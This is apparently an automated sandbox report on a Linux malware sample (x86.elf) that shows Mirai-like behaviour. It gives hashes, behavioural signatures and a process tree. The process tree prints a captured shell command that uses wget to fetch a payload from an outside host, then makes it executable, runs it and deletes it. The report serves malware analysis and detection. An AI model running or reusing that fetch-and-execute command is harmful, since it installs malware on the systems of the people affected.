Analysis
- max time kernel: 0s
- max time network: 134s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20221111-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20221111-en, kernel:4.15.0-161-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 08-04-2023 21:51
Behavioral task
- task: behavioral1
- Sample: x86.elf
- Resource: ubuntu1804-amd64-20221111-en
General
- Target: x86.elf
- Size: 114KB
- MD5: d219cae24ada1bd4cd696e9830d8d96d
- SHA1: 4d1b9ec042954e7c2ed9348629318b7936822a40
- SHA256: 768d8a5e0bdea22776c1570bf82e7c8089577c7d44d0dee87101992c7bae9827
- SHA512: a2eaa10d31e5cb41a80cdaeef895c18d36db2c67df714e44e9895e3765ec20f770a9d497accdc4ea0746a95f34390153213e30c4d3199ffa507b740e3e204376
- SSDEEP: 3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJioub2yd1m7FnVqfJXoebNb:SKo/O8qtUbKRbm7FnVqfJXoebNb
Malware Config
Signatures
- Modifies the Watchdog daemon (1 TTPs)
  Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
- Modifies hosts file (1 IoCs)
  Adds to hosts file used for mapping hosts to IP addresses.
  Processes:
  - process: wget, ioc: /etc/hosts
- Writes DNS configuration (1 TTPs, 1 IoCs)
  Writes data to DNS resolver config file.
- Reads system routing table (1 TTPs, 1 IoCs)
  Gets active network interfaces from /proc virtual filesystem.
  Processes:
  - process: x86.elf, ioc: /proc/net/route
- Reads system network configuration (1 TTPs, 1 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  Processes:
  - process: x86.elf, ioc: /proc/net/route
Processes
- /tmp/x86.elf
  Command line: /tmp/x86.elf
  PID: 618
  - Reads system routing table
  - Reads system network configuration
- /bin/sh
  Command line: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
  PID: 619
  - /usr/bin/wget
    Command line: wget -q http://gay.energy/.../vivid -O .....
    PID: 623
    - Modifies hosts file
    - Writes DNS configuration
  - /bin/chmod
    Command line: chmod 777 .....
    PID: 624
  - ./.....
    Command line: ./.....
    PID: 625
  - /bin/sh
    Command line: /bin/sh ./.....
    PID: 625
  - /bin/rm
    Command line: rm -rf .....
    PID: 627